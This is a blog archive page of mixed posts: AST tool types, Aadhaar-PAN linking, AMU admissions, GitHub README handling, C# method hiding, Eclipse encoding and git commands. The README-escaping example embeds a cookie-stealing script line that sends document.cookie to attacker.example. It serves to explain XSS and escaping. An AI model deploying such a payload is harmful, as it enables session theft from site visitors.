Showing posts with label aligarh. Show all posts

Sunday, September 5, 2021

Different Application Security Testing Tools: Major Classification

Static Application Security Testing (SAST)

SAST tools are a form of white-box testing: the tester has knowledge of the system being tested, such as an architecture diagram and access to the source code. SAST tools examine source code at rest to detect and report weaknesses that can lead to security vulnerabilities.

Source-code analyzers can run on non-compiled code to check for defects such as numerical errors, input validation, race conditions, path traversals, pointers and references, and more. Binary and byte-code analyzers do the same on built and compiled code. Some tools run on source code only, some on compiled code only, and some on both.


Dynamic Application Security Testing (DAST)

In contrast to SAST tools, DAST tools perform black-box testing: the tester has no prior knowledge of the system's internals. They detect conditions that indicate a security vulnerability in an application in its running state. DAST tools exercise running code to detect issues with interfaces, requests, responses, scripting (e.g. JavaScript), data injection, sessions, authentication, and more.

DAST tools employ fuzzing too: throwing known invalid and unexpected test cases at an application, often in large volume.


Origin Analysis/Software Composition Analysis (SCA)

Software-governance processes that depend on manual inspection are prone to failure. SCA tools examine software to determine the origins of all components and libraries within it. They work by comparing the known modules found in the code (typically taken from a manifest, a lock file or the built artifact) against a list of known vulnerabilities, and they will often also advise when a component is out of date or has a patch available.

SCA tools are most effective at finding common and popular libraries and components, particularly open-source ones, because those are the components that appear in public vulnerability feeds. They do not, however, detect vulnerabilities in in-house, custom-developed components, which never appear in any such feed.
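To make the matching step concrete, here is an added example written for this page (it is not code from any SCA product) that shows what "comparing known modules found in code to a list of known vulnerabilities" means in practice. The manifest, the advisory identifiers and the version ranges are all constructed for the illustration; the in-house `acme-billing` package is included to show the gap described above: nothing in the feed covers it, so the scanner is silent about it. Versions are compared as integer tuples rather than strings, which is the classic mistake in home-grown matchers (lexically, "1.9.0" sorts after "1.10.0").

```python
import re

# Constructed sample manifest in pip requirements.txt style (not a real project).
SAMPLE_MANIFEST = """\
requests==2.19.1
urllib3==1.24.1
flask==2.2.5
acme-billing==3.1.0   # in-house component: no advisory feed knows about it
"""

# Constructed advisory feed: package -> [(advisory id, affected range, fixed in)].
# The identifiers and ranges are invented for this example; they are not real advisories.
SAMPLE_ADVISORIES = {
    "requests": [("EXAMPLE-2018-0001", "<2.20.0", "2.20.0")],
    "urllib3": [
        ("EXAMPLE-2019-0002", ">=1.0.0,<1.24.2", "1.24.2"),
        ("EXAMPLE-2020-0003", "<1.25.9", "1.25.9"),
    ],
}

OPS = {
    "<": lambda a, b: a < b,
    "<=": lambda a, b: a <= b,
    ">": lambda a, b: a > b,
    ">=": lambda a, b: a >= b,
    "==": lambda a, b: a == b,
}


def parse_version(text):
    """Turn '1.24.1' into (1, 24, 1) so versions compare numerically, not lexically."""
    return tuple(int(part) for part in text.split("."))


def parse_manifest(text):
    """Return {package: pinned version}; reject anything that is not an exact pin."""
    deps = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments and blank lines
        if not line:
            continue
        match = re.fullmatch(r"([A-Za-z0-9_.-]+)==([0-9.]+)", line)
        if not match:
            raise ValueError(f"unpinned or malformed requirement: {line!r}")
        deps[match.group(1).lower()] = match.group(2)
    return deps


def version_in_range(version, spec):
    """True when every comma-separated clause of spec (e.g. '>=1.0.0,<1.24.2') holds."""
    have = parse_version(version)
    for clause in spec.split(","):
        match = re.fullmatch(r"(<=|>=|==|<|>)([0-9.]+)", clause.strip())
        if not match:
            raise ValueError(f"bad range clause: {clause!r}")
        if not OPS[match.group(1)](have, parse_version(match.group(2))):
            return False
    return True


def scan(manifest_text, advisories):
    """Match each pinned dependency against the advisory feed and report the hits."""
    findings = []
    for name, version in parse_manifest(manifest_text).items():
        for advisory_id, affected, fixed_in in advisories.get(name, []):
            if version_in_range(version, affected):
                findings.append({
                    "package": name,
                    "installed": version,
                    "advisory": advisory_id,
                    "fixed_in": fixed_in,
                })
    return findings


if __name__ == "__main__":
    for hit in scan(SAMPLE_MANIFEST, SAMPLE_ADVISORIES):
        print(f"{hit['package']}=={hit['installed']}: {hit['advisory']} "
              f"(fixed in {hit['fixed_in']})")
```

Run as a script it reports three hits (one for requests, two for urllib3) and nothing for flask or acme-billing. A real tool does the same thing with a large feed (NVD, OSV, GitHub advisories), with richer version grammars and with transitive dependencies resolved from the lock file rather than the top-level manifest.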


Database Security Scanning

The SQL Slammer worm of 2003 exploited a known vulnerability in a database-management system (Microsoft SQL Server 2000) for which a patch had been released about six months before the attack. Although databases are not always considered part of an application, application developers often rely heavily on the database, and applications can often heavily affect databases. Database-security-scanning tools check for updated patches and versions, weak passwords, configuration errors, access control list (ACL) issues, and more. Some tools can mine logs looking for irregular patterns or actions, such as excessive administrative actions.


Interactive Application Security Testing (IAST) and Hybrid Tools

Hybrid approaches have been available for a long time, but more recently have been categorized and discussed using the term IAST. IAST tools use a combination of static and dynamic analysis techniques. They can test whether known vulnerabilities in code are actually exploitable in the running application.

IAST tools use knowledge of application flow and data flow to create advanced attack scenarios and use dynamic analysis results recursively: as a dynamic scan is being performed, the tool will learn things about the application based on how it responds to test cases. 


Mobile Application Security Testing (MAST)

MAST tools are a blend of static, dynamic, and forensic analysis. They perform some of the same functions as traditional static and dynamic analyzers but enable mobile code to be run through many of those analyzers as well. MAST tools have specialized features that focus on issues specific to mobile applications, such as jail-breaking or rooting of the device, spoofed Wi-Fi connections, handling and validation of certificates, prevention of data leakage, and more.


Application Security Testing as a Service (ASTaaS)

As the name suggests, with ASTaaS, you pay someone to perform security testing on your application. The service will usually be a combination of static and dynamic analysis, penetration testing, testing of application programming interfaces (APIs), risk assessments, and more. ASTaaS can be used on traditional applications, especially mobile and web apps.

Momentum for the use of ASTaaS is coming from use of cloud applications, where resources for testing are easier to marshal.


Correlation Tools

Dealing with false positives is a big issue in application security testing. Correlation tools can help reduce some of the noise by providing a central repository for findings from other AST tools.

Different AST tools will report different findings, often for the same underlying weakness, so correlation tools correlate and analyze results across tools and help with validation and prioritization of findings, including remediation workflows. Although some correlation tools include their own code scanners, they are useful mainly for importing findings from other tools.
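The core of a correlation tool is a normalization key: two findings from two tools about the same weakness in the same place should collapse into one record, and a weakness that several tools agree on should rise to the top. The example below is added here to show that logic on constructed data; it is not code from any correlation product, and the tool names, field names and findings are all invented for the illustration. Real exports would normally be SARIF or the vendor's own JSON.

```python
from collections import defaultdict

SEVERITY_RANK = {"critical": 4, "high": 3, "medium": 2, "low": 1}

# Constructed findings as two different tools might export them (the tool names,
# field names and contents are invented for this example).
SAST_EXPORT = [
    {"tool": "sast-tool", "cwe": 89, "path": "src/app/db.py", "line": 42,
     "severity": "high", "title": "SQL query built with string formatting"},
    {"tool": "sast-tool", "cwe": 79, "path": "src/app/views.py", "line": 17,
     "severity": "medium", "title": "Unescaped output in template"},
    {"tool": "sast-tool", "cwe": 798, "path": "src/app/config.py", "line": 3,
     "severity": "low", "title": "Hard-coded credential"},
]
DAST_EXPORT = [
    {"tool": "dast-tool", "cwe": 89, "path": "src/app/db.py", "line": 44,
     "severity": "critical", "title": "SQL injection confirmed via /search"},
    {"tool": "dast-tool", "cwe": 352, "path": "src/app/views.py", "line": 0,
     "severity": "medium", "title": "Missing CSRF token"},
]


def finding_key(finding, line_window=5):
    """Normalize a finding to (CWE, file, line bucket) so two tools that describe the
    same weakness a few lines apart land on the same key."""
    return (finding["cwe"], finding["path"], finding["line"] // line_window)


def correlate(*exports, line_window=5):
    """Merge findings from several tools; rank multi-tool hits and high severity first."""
    groups = defaultdict(list)
    for export in exports:
        for finding in export:
            groups[finding_key(finding, line_window)].append(finding)

    merged = []
    for (cwe, path, _bucket), group in groups.items():
        tools = sorted({f["tool"] for f in group})
        # Keep the most severe rating any tool assigned to the group.
        worst = max(group, key=lambda f: SEVERITY_RANK[f["severity"]])["severity"]
        merged.append({
            "cwe": cwe,
            "path": path,
            "lines": sorted({f["line"] for f in group}),
            "severity": worst,
            "tools": tools,
            "confirmed": len(tools) > 1,   # independent tools agree: much less likely a false positive
            "titles": [f["title"] for f in group],
        })

    merged.sort(key=lambda m: (m["confirmed"], SEVERITY_RANK[m["severity"]]), reverse=True)
    return merged


if __name__ == "__main__":
    for item in correlate(SAST_EXPORT, DAST_EXPORT):
        flag = "CONFIRMED" if item["confirmed"] else "single-tool"
        print(f"{item['severity']:8} CWE-{item['cwe']:<4} {item['path']}:{item['lines']} "
              f"[{flag}: {', '.join(item['tools'])}]")
```

The five input findings collapse to four records, and the SQL injection that both tools saw (lines 42 and 44 fall in the same five-line bucket) is the only confirmed one and sorts first. The bucket width is a tuning knob: too small and the same issue stays split, too large and unrelated findings of the same CWE in one file merge.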


Test-Coverage Analyzers

Test-coverage analyzers measure how much of the total program code has been analyzed. The results can be presented in terms of statement coverage (percentage of lines of code tested) or branch coverage (percentage of available paths tested).

For large applications, acceptable levels of coverage can be determined in advance and then compared to the results produced by test-coverage analyzers to accelerate the testing-and-release process. These tools can also detect whether particular lines of code or branches of logic cannot be reached at all during program execution, which is inefficient and a potential security concern, because code that tests never exercise can hide defects indefinitely. Some SAST tools incorporate this functionality into their products, but standalone products also exist.


Application Security Testing Orchestration (ASTO)

While the term ASTO is newly coined by Gartner since this is an emerging field, there are tools that have been doing ASTO already, mainly those created by correlation-tool vendors. The idea of ASTO is to have central, coordinated management and reporting of all the different AST tools running in an ecosystem. It is still too early to know if the term and product lines will endure, but as automated testing becomes more ubiquitous, ASTO does fill a need.


Selecting Testing Tool Types

There are many factors to consider when selecting from among these different types of AST tools. If you are wondering how to begin, the biggest decision you will make is simply to start using the tools at all. According to a 2013 Microsoft security study, 76 percent of U.S. developers use no secure application-program process and more than 40 percent of software developers globally said that security wasn't a top priority for them. Our strongest recommendation is that you exclude yourself from these percentages.

There are factors that will help you decide which type of AST tools to use and which products within an AST tool class to use. It is important to note, however, that no single tool will solve all problems. Security is not binary; the goal is to reduce risk and exposure.


Network Security Tools

Though they are not directly part of the application security domain, without these fully implemented and running, the application will be exposed to far more risk. There is a separate post listing the types of network security tools.



Friday, June 30, 2017

Link Aadhaar and PAN card : Income Tax India New Rule demystified at W3LC.com

Now that it is official that you need to link your Aadhaar and PAN card details, the obvious question is how to do it. This post will explain that. But before that, I would like to explain some points.


The Honourable Supreme Court in its landmark judgement has upheld Section 139AA of the Income Tax Act as constitutionally valid which required quoting of the Aadhaar number in applying for PAN as well as for filing of income tax returns. The Income Tax India official website shows this message clearly as on 14/06/2017. CBDT has extended the due date of furnishing Statement of Financial Transactions for AY 2017-18 from 31st May 2017 to 30th June 2017. https://incometaxindiaefiling.gov.in/




Method 1: Online portal to link your Aadhaar with PAN:

* Go to the income tax e-filing website https://incometaxindiaefiling.gov.in/
* Click on the tab 'Link Aadhaar' on the left-hand side of the website. (See above screenshot)
* This will automatically lead you to https://incometaxindiaefiling.gov.in/e-Filing/Services/LinkAadhaarHome.html
* Fill in your PAN and Aadhaar number
* Then enter your name exactly as mentioned in Aadhaar.
* Enter the captcha and click on 'Link Aadhaar'.
* After verification of the details with the Unique Identification Authority of India (UIDAI), the linking will be confirmed.
* You will also get an email at your registered email Id.
* In case the linking was already done earlier, it will tell you that it is already linked.


Method 2: SMS method to link your Aadhaar and PAN card

For this you have to keep ready following information:
1. The phone number registered with your Aadhaar card
2. Your Aadhaar Number
3. Your PAN number

You need to send an SMS in a required format to given number by the government of India.

SMS format to link Aadhaar with PAN:
Send an SMS to 567678 or 56161 from your registered mobile number in the following format:
UIDPAN <12-digit Aadhaar number> <10-digit PAN>

Example:
UIDPAN 123456789000 ABCDE1234M


Article on Hindustan Times
Guide on Business Standard Website
https://cleartax.in/s/how-to-link-aadhaar-to-pan
BankBazaar Notes




Saturday, May 20, 2017

AMU Engineering cut off explained : Demystifying questions like Can I get admission in the Aligarh Muslim University BTech with a score of 72?

This article will explain every bit of the AMU Engineering cutoff and waiting lists.

To start with, a simple answer to what is the cutoff for the engineering entrance examination - Fluctuating!

Many young students often ask questions like: Can I get admission to the AMU BTech with a score of 72? My reply to all of them would be: you are right on the margin, and nothing can be predicted with certainty at this score!

Having said that, I congratulate them on the efforts they have put in. They surely are among the good students who have the mettle to get admitted to this prestigious university. To anyone with this high score, you now have 3 options:

1. Wait and watch for the results to come. I wish you all the best, and once selected, respond here with the good news.
2. Hold tight! You might also get included in the waiting lists. There might be 3 waiting lists. You can get admission if people drop off and do not take up their admissions.
3. Start focusing on other exams and preparations; never lose focus waiting for the results of one exam. Exams are a part of life, not life itself!



It should be understood that the cutoff shall be based on some of the influential factors which affect the same to a great extent. Various aspects are taken into consideration while announcing the AMUEEE 2017 Cutoff Marks. It varies highly with the difficulty level of question paper and other factors. Generally,  for moderate level of difficulty , it is around 70-75 for external students and around 60-65 for internal students.



The total number of seats are around 365 and number of seats in different trades are as follows:
Chemical Engineering - 30
Civil Engineering - 60
Computer engineering - 50
Electrical Engineering - 60
Electronics Engineering - 50
Mechanical engineering - 90
Petrochemical Engineering - 20
BArch - 20


The cutoff depends on how many well-prepared candidates appeared for the exam that year, on the question paper, and on whether you are internal or external. Some important factors you can use to estimate the cutoff for the present year are listed below:

  • Total Number of students
  • Availability of seats
  • Toughness level of examination
  • Lowest and average marks in the entrance examination
  • Marking scheme
  • Performance of the candidates
  • Previous year cutoff trends


As per the official notifications:

AMU determines the minimum scores obtained by the candidates to be considered for admission to various engineering courses at the university. AMUEEE 2017 cutoff involves various important aspects. The vital aspects are given below.
For admission to various undergraduate engineering courses at AMU, the candidates have to either score the minimum required cutoff marks or above that.
AMU conducts AMUEEE 2017 and is the competent authority that decides AMUEEE 2017 cutoff marks.
AMUEEE cutoff 2017 is determined by various factors like candidates’ performance level, seat capacity of the respective courses, total number of test takers, and difficulty level of the paper and reservation policy.
Aspirants, who fail to secure the minimum marks required for admission to AMU through AMUEEE 2017, will not be considered eligible for admissions to B. Tech courses at the university.
On the basis of AMUEEE 2017 cutoff, AMU prepares AMUEEE 2017 merit list for the examinees.
As per their ranks in AMUEEE 2017 merit list, seats are allocated to candidates.



My three pieces of advice here:

  1. Concentrate on your preparations and give your best shot. Don't prepare with a preset target score as it can deceive you into making a wrong decision at your test date. Think 95% plus!
  2. Even if you don't get your favorite branch, you have a chance to change your branch in the beginning of your second year, provided you study well. I did that. You need to have very high scores in your first year results.
  3. In case you get a waiting list, do not be disheartened. There is a good chance that it will get clear as many would cancel their admissions. 


I wish all the students a very best of luck in all the engineering entrance exams. You all are a gem and a treasure for the nation.

Jai Hind & Jai Ho!


Sunday, May 14, 2017

Using Github ReadMe opened programatically : How to open and read the ReadMe.md file dynamically


It is worth understanding that inline HTML (a sanitized subset of it) works inside a ReadMe.md file on GitHub. With this clear, many related questions answer themselves, such as how to make bold text in a README or how to insert an image. Note also that how the file displays depends a lot on the application or text editor you are using, and on the OS.


Recently I had trouble inserting a blank line in the Readme.md file on GitHub. I personally preferred the <br /> tag there, and I have a full post describing the same: http://www.w3lc.com/2017/05/new-line-in-readme-file-github-fixing.html.


I have demonstrated the change in a git commit in the Github repository explained in the post. See: https://github.com/Anwar-Faiz/Simple-Java-Unicode/commit/85bd54531067ff4055c5e8801aba5324221d5ae3



This understanding was much needed to handle the question and also to find many other uses of why you would probably need to do it!



Further, to answer the question straight, you need two steps: 

1. Find the Url for the ReadMe.md file in Raw version. For example see one: https://raw.githubusercontent.com/Anwar-Faiz/forkrap/master/README.md 

How to open Raw view of ReadMe.md file: ( See screenshot )



2. Now, if you want to do it server-side, you can load that URL with PHP's file_get_contents() (or curl). Or, if you want to do it in the browser with jQuery, you can use .load(). Keep in mind that .load() inserts the response as HTML, which matters for the escaping point below.



** Also notice that if you View Source on the Raw URL page, you see just plain text. So you don't need to do much text parsing either :) This is good news.

** Next, because the raw file is plain text but you are inserting it into an HTML page, you must HTML-escape the characters the browser would otherwise interpret as markup: <, >, & and the quote characters ' and ". Tools like codebeautify can do this for a one-off; in code, use your language's escaping function or set the element's text content rather than its HTML. If you skip this step, any HTML or script inside the README (content you may not control if the repository is not yours) becomes part of your page and runs there.
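As an added illustration of that last point (this is example code written for this page, not code from the post's repositories), here is the naive server-side rendering next to the escaped one. The README text is constructed for the example; the script line stands in for anything in a README you did not write yourself.

```python
import html

# Constructed README text, as the raw endpoint would return it (plain Markdown, not
# the rendered page). The <script> line stands in for content you did not write.
SAMPLE_RAW_README = """\
# Simple-Java-Unicode

Prints "Hi World!" and a few Unicode strings.<br />
Tested with Java 8 & Eclipse.
<script>document.location='https://attacker.example/?c='+document.cookie</script>
"""


def render_readme_unsafe(raw):
    """What plain string concatenation (or jQuery .load()/.html()) does: the README's
    own markup, including any <script>, becomes part of your page and executes."""
    return '<div class="readme">' + raw + "</div>"


def render_readme_safe(raw):
    """Escape &, <, > and both quote characters so the README is displayed as text
    and never parsed as HTML. Use <pre> to keep the line structure readable."""
    return '<pre class="readme">' + html.escape(raw, quote=True) + "</pre>"


if __name__ == "__main__":
    print(render_readme_unsafe(SAMPLE_RAW_README))
    print("-" * 40)
    print(render_readme_safe(SAMPLE_RAW_README))
```

The safe version turns `<script>` into `&lt;script&gt;`, `&` into `&amp;` and the quotes into `&quot;` and `&#x27;`, so the browser shows the README verbatim instead of executing it. If you want the README rendered as Markdown rather than shown raw, run it through a Markdown converter that sanitizes HTML, which is what GitHub itself does.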




To create sophisticated formatting for your prose and code on GitHub with simple syntax, you can refer the basic writing and formatting syntax at: https://help.github.com/articles/basic-writing-and-formatting-syntax/


Have a great Day dear :)

@Anwar Jamal Faiz


Saturday, May 13, 2017

New line in ReadMe file Github: Fixing the blank new line break issue in ReadMe.Md files in Github

This post is aimed at fixing a very simple issue: the blank line / line break problem in ReadMe.md files on GitHub. You can find the ReadMe.md file that had this problem, and how it was fixed, in my GitHub repository: https://github.com/Anwar-Faiz/Simple-Java-Unicode


When editing an issue and clicking Preview, the following lines:
a
b
c
are shown with every letter on a new line.

However, after pushing the same markdown source structure in README.md, GitHub joins all the letters onto one line.

Issue: GitHub renders issue and comment text with single newlines as line breaks, whereas files such as README.md follow the standard Markdown rule that a single newline inside a paragraph is a soft break, so the lines are joined. The operating system and text editor do not change that rule, although editors that strip trailing whitespace on save will silently undo the two-trailing-spaces fix below.


Solution:
Interpreting single newlines as <br> used to be a feature of GitHub's README rendering, but recent documentation does not list it as a feature. So you have to do it manually. But it's easy!

Method 1: End each line with two trailing spaces (Markdown's hard line break). With _ standing in for a space, transform:
a
b
c
into the following in the ReadMe.md file:
a__
b__
c
(where each _ is a literal space character).

Method 2: Explicitly add <br> tags, e.g.:
a<br>
b<br>
c


I personally prefer method 2 for a number of reasons. For example you can see following commit of mine just to fix the same issue:
https://github.com/Anwar-Faiz/Simple-Java-Unicode/commit/85bd54531067ff4055c5e8801aba5324221d5ae3


Using Github ReadMe opened programatically : How to open and read the ReadMe.md file dynamically: https://www.w3lc.com/2017/05/using-github-readme-opened.html


To create sophisticated formatting for your prose and code on GitHub with simple syntax, you can refer the basic writing and formatting syntax at: https://help.github.com/articles/basic-writing-and-formatting-syntax/

Cheers ;)
Anwar Faiz

Method hiding vs overriding in C# : A feature that can be the cause of big troubles later

Here I try to show a feature of C#. This is not in Java, and I have proactively tested that ;)

Example: Class A has a Print method; class B inherits from class A and defines a Print method with the same signature as well. You might expect Print to be overridden now. It is not: in C# a method is only overridden when the base method is marked virtual (or abstract) and the derived method is marked override. Without those, the derived Print hides the base one.

Now test carefully what happens with the Print method signature in class B. If you add the new keyword there, the intent becomes explicit: the method does not override, it hides the base method. Without new the behaviour is the same, but the compiler warns (CS0108). For reference, I have the GitHub repository up and running: https://github.com/Anwar-Faiz/Method-Hiding-Demo

Most important: in normal object calls this will not be caught. The behavior difference is seen when you access the object through a variable of the parent class type.


Let us start with defining some classes, and see a working example:

    // A.Print is neither virtual nor abstract, so nothing can override it.
    class A
    {
        public string Print()
        {
            return "A";
        }
    }

    // B.Print has the same signature but no 'override' (and A.Print is not virtual):
    // it HIDES A.Print. The compiler emits warning CS0108 because 'new' is missing.
    class B : A
    {
        public string Print()
        {
            return "B";
        }
    }

    class A2
    {
        public string Print()
        {
            return "A2";
        }
    }

    // Same thing with the hiding made explicit by 'new': no warning, same behaviour.
    // A call through an A2-typed variable that holds a B2 still runs A2.Print.
    class B2 : A2
    {
        public new string Print()
        {
            return "B2";
        }
    }

Now let us write a program to check the behavior in both ways. See attached screenshot:



The result of the run is as follows:


Demo of overriding...
 a.Getname : A
 b.Getname : B
 a2.Getname : A2
 b2.Getname : B2

Demo of method hiding...
 x.Getname : A
 y.Getname : A2



This clearly shows that in the second case, when the object is accessed through a base-class variable, the method of the child class is hidden and the base version runs!


Issues seen with this feature in C#:
What I foresee here are a couple of problems:
1. Programmers coming from other languages who read this part of the code will have a tough time understanding what is happening.
2. There is a huge difference between the way overriding works and the way method hiding behaves; this feature may prove to be a step back towards non-OOP days!
3. More importantly, the function written in the child class is of no use when the object is accessed through the base type. It becomes hidden, in a way.
4. Further, hiding is the default behavior in C#: you do not even need to write the new keyword (you only get a warning). Also, if the method in the base class is marked virtual and you forget to mark the method in the inheriting class with override, you land in method hiding instead of overriding.
5. If a bug is encountered, it will be hard to find that the trouble is caused by a new keyword.


Proposed solution to team Microsoft working on this:
As we know, since it has already been introduced, it will be tough to remove. Particularly because many have already started using it in their projects. I know team Microsoft spends a lot of effort on backwards compatibility, and they are really good at that! So the best option is to surface this in the Visual Studio editor and as a compile-time warning. Note that the compiler already emits warning CS0108 when a member hides an inherited member without the new keyword; building with TreatWarningsAsErrors (or promoting CS0108 specifically with WarningsAsErrors) turns that into a hard failure, which is the practical way to enforce it today.

PS: You can download working repository of code sample at:
https://github.com/Anwar-Faiz/Method-Hiding-Demo


Have a happy coding and testing guys!
@Anwar Faiz


Tuesday, May 9, 2017

Unicode characters in Eclipse console : Resolving Eclipse IDE issue when console runner not shows Unicode and Multibyte characters.

First of all, a little gyaan (background):

What is a Unicode character string:
Earlier we used ASCII and similar encodings to encode characters. But the number of characters was limited; obviously, you cannot capture the world in 256 numbers!
Then more encodings were developed to cater to different languages, but many of them had issues such as:
1. A particular code value corresponds to different letters in the various language standards.
2. The encodings for languages with large character sets have variable length. Some common characters are encoded as single bytes, others require two or more bytes.

Here enters our beloved Unicode. Unicode assigns every character a single code point, from U+0000 to U+10FFFF, independent of language. How those code points are stored in bytes is a separate matter (the encoding: UTF-8, UTF-16 or UTF-32). Java's char is a 16-bit UTF-16 code unit, so the range below is the range of a single char; characters above U+FFFF take two chars. In C++ a plain char is one byte, and the encoding is up to the program and the platform.

lowest value of a Java char: \u0000
highest value of a Java char: \uFFFF


My problem statement in this post is that sometimes the unicode characters are not visible in the output console of Eclipse IDE. This blog post aims to solve that.



Suppose our program is:
public class Simple {
    public static void main(String... args) {
        System.out.println("Hi World!");

        // Source file saved as UTF-8; in memory these are ordinary UTF-16 Strings.
        String arabicText = "اسمي أنور";
        String banglaText = "আমার নাম আনোয়ার";
        String urduText = "میرا نام انور ہے";
        String hindiText = "मेरा नाम अनवर है";
        String frenchText = "Je m'appelle Anwar";

        // Whether these display correctly depends on the encoding used for the bytes
        // System.out writes to the console, not on the Strings themselves.
        System.out.println(arabicText);
        System.out.println(banglaText);
        System.out.println(urduText);
        System.out.println(hindiText);
        System.out.println(frenchText);
    }
}

On running the output is:
Hi World!
???? ????
???? ??? ???????
???? ??? ???? ??
???? ??? ???? ??
Je m'appelle Anwar

See screenshot:






To resolve this you need to modify your Run Configuration. To open it:
In Package Explorer, right click on your project
Run As -> Run Configurations


In the Common tab, check the Encoding used:

Change it to UTF-8.
Click Apply and Run.





Now Run the program and you should find correct result. New output is:

Hi World!
اسمي أنور
আমার নাম আনোয়ার
میرا نام انور ہے
मेरा नाम अनवर है
Je m'appelle Anwar

See screenshot:

You can download the repository with the sample code from GitHub. See: https://github.com/Anwar-Faiz/Simple-Java-Unicode
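Why the console shows question marks rather than the letters is worth seeing in isolation. The added example below (written for this page; it is not part of the post's Java repository) simulates what the console does with the program's output: the characters are encoded with the console's encoding and anything that encoding cannot represent is replaced. The assumption here is that the legacy encoding is Windows-1252 (cp1252), the usual default on English Windows installations; with UTF-8, as the post's fix selects, every character survives. The Arabic sample is the same text as in the post, written with escapes so the example is independent of how the page stores it.

```python
# Constructed console-encoding simulation (not code from the post's repository).
# Eclipse writes the program's output using the run configuration's encoding; a
# character that encoding cannot represent is replaced, which is where the '?' come from.

# Same text as in the post: "اسمي أنور" (four letters, a space, four letters).
ARABIC = "\u0627\u0633\u0645\u064a \u0623\u0646\u0648\u0631"
FRENCH = "Je m'appelle Anwar"
SAMPLE_LINES = ["Hi World!", ARABIC, FRENCH]

# Assumption: cp1252 (Windows-1252) is the legacy default; any single-byte encoding
# without these letters behaves the same way.
LEGACY_ENCODING = "cp1252"


def render_on_console(text, console_encoding):
    """Return what a console using console_encoding displays for text.

    errors="replace" mirrors the console's behaviour: unrepresentable characters become
    '?', while ASCII (and for cp1252, Western European letters) pass through unchanged."""
    return text.encode(console_encoding, errors="replace").decode(console_encoding)


def render_all(lines, console_encoding):
    return [render_on_console(line, console_encoding) for line in lines]


def lost_characters(text, console_encoding):
    """Count how many characters of text the given console encoding would destroy."""
    shown = render_on_console(text, console_encoding)
    return sum(1 for original, out in zip(text, shown) if original != out)


if __name__ == "__main__":
    for encoding in (LEGACY_ENCODING, "utf-8"):
        print(f"--- console encoding: {encoding}")
        for line in render_all(SAMPLE_LINES, encoding):
            print(line)
```

With cp1252 the Arabic line comes out as "???? ????" (exactly the pattern in the post's first run) and the French line is untouched, which is why only the non-Latin lines were mangled; with utf-8 nothing is lost. The same mechanism applies to any Java program whose output is captured by a terminal, a log collector or a CI runner with a narrower encoding than the text.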

Friday, March 24, 2017

Fatal: bad object error in Git cherry-pick - Why is this error thrown during cherry picking in Git?

In one of my earlier blog post, I explained how to cherry-pick in Git. To understand more about what does cherry picking a commit in git mean and how to do it, refer:
W3LC: Git Cherry Pick Command Tutorial

This post deals with the situation when you get a fatal error in your attempt to cherry-pick. The error is as follows:
"fatal: bad object"

So here I would like to explain why this occurs. The cause is that the commit you named does not exist in your local object database: Git has never fetched it, typically because the remote branch that contains it has not been fetched to your local system.

Technically, if the branch is not present locally, you don't have the right data, and you get errors like "fatal: bad object".

Solution:
To solve this you first need to fetch the missing objects to your local system. To do this use the fetch command of Git.

1. fetch from the default remote (origin):
git fetch
2. or fetch from all configured remotes:
git fetch --all

Here we should take a short break and understand what the Git fetch command is:

W3LC definition: In the simplest terms, git pull does a git fetch followed by a git merge.
git fetch downloads new objects and updates your remote-tracking branches (refs/remotes/...), but it never changes any of your own local branches under refs/heads, so it is safe to run without touching your working copy. git pull is what you would do to bring a local branch up to date with its remote version; it does this by first fetching (which is what updates the remote-tracking branches) and then merging.


So, let us assume that you fetched the information about all branches.

Now, make sure you're back on the branch you want to cherry-pick to. And use the git cherry-pick command again. Example:
git cherry-pick 9505ac61c924de0bba404f40f8abdc53af1909d8

Great. Now it should work!


Do also read if you want to change the name of your git branch. The process to do so is explained fully on my earlier blog post:
W3LC: Git Rename a Branch Name

Git : Cherry-pick a commit in branch

Friends, it is a very common situation that you are on a new branch of your own but want to bring information or changes from another branch.

Sometimes you also land in a situation where you have been asked to cherry-pick a commit. But you have no idea what it means! Trust me, that was the case with me when I heard this while I was at Symantec. The history is that we used Perforce for version control, but a new team started using Git. And cherry picking was something that needed a beer to actually understand ;)

So what does cherry picking a commit in git mean? How do you do it?

Solution:
Cherry picking in Git means choosing a commit from one branch and applying it onto another.
Note that it is different from merge and rebase, which normally apply many commits onto another branch.

Syntax:
git cherry-pick <commit-hash>

Example:
First make sure you are on the branch you want to apply the commit to. For instance, suppose you have to bring the changes into master itself:
git checkout master

Now execute the following:
git cherry-pick <commit-hash>
Eg: git cherry-pick 3d05ac6159e4de0bba404f40f8abdca3af1903d3


Voila!
You're done. Just check your branch for the new changes. The history will show the changes from that commit in your branch as well, as a new commit with its own hash.

CAUTION:
In case you get an error like:
fatal: bad object 02x661db5adf2anwarJamalFaizeacf09f048b8b11
It means that the branch information is not locally present. To solve this I have already written another post. Thank me for this ;)  http://www.w3lc.com/2017/03/fatal-bad-object-error-in-git-cherry.html


Note:
Do also read if you want to change the name of your git branch. The process to do so is explained fully on my earlier blog post:
W3LC: Rename Branch Name in Git

Git : Rename / Change Branch name : How to Change the branch name of a local or a remote branch in git

There are multiple scenarios if you want to change the name of the branch. Sometimes you could have named a branch incorrectly, and sometimes it could be because you didn't follow the naming guidelines as per your team and organisation. Whatever be the cause, you very well need to know the method to do so.


The process is as follows:

1. First, rename your local branch. (Sometimes this is all you need, for example if the branch has not yet been pushed to Stash or any other remote.)
If you are on the branch you want to rename:
Syntax: git branch -m new-name


2. If you are on a different branch:
Syntax: git branch -m old-name new-name


3. Now suppose you want to delete the old remote branch and push the new-name local branch:
Syntax: git push origin :old-name new-name


4. Or, set the upstream of the renamed local branch. For this, switch to your new local branch and then:
Syntax: git push origin -u new-name

Tuesday, February 28, 2017

CD with mapped mounted drive on network : CHDIR command


It has happened to me that I was able to successfully mount a network drive and could freely access it using Windows File Explorer. But my script was not able to access it. Digging a step further, I noticed that I could not even CD to that drive at the command prompt. Hence I finally wrote this blog post for anyone running into a similar issue.

Question: How do I change to a mapped network drive at the command line?

Issue:
Say you have a network drive mapped to "U:\"
Now you want to go to that drive from a command line.
However, when you try, you get an error such as:
C:\>u:
The system cannot find the drive specified.


Solution:
There are two aspects to the solution:
1. The syntax. To change drive and directory in one step use cd /d U:\path\on\share; a plain cd U:\path without /d only changes U:'s current directory and leaves you on C:. Typing U: on its own does switch drives, so if that already fails the problem is not the syntax.
2. More often the real cause is that the mapping does not exist in the session your command prompt or script runs in. Drive mappings belong to a logon session, so a drive mapped in Explorer is not visible from an elevated (Run as administrator) prompt, from another user account, or from a scheduled task or service. Check what the current session knows about with:
net use u:
If that reports an error instead of the mapping, recreate it in this session (or in the script itself) with:
net use u: \\server\share

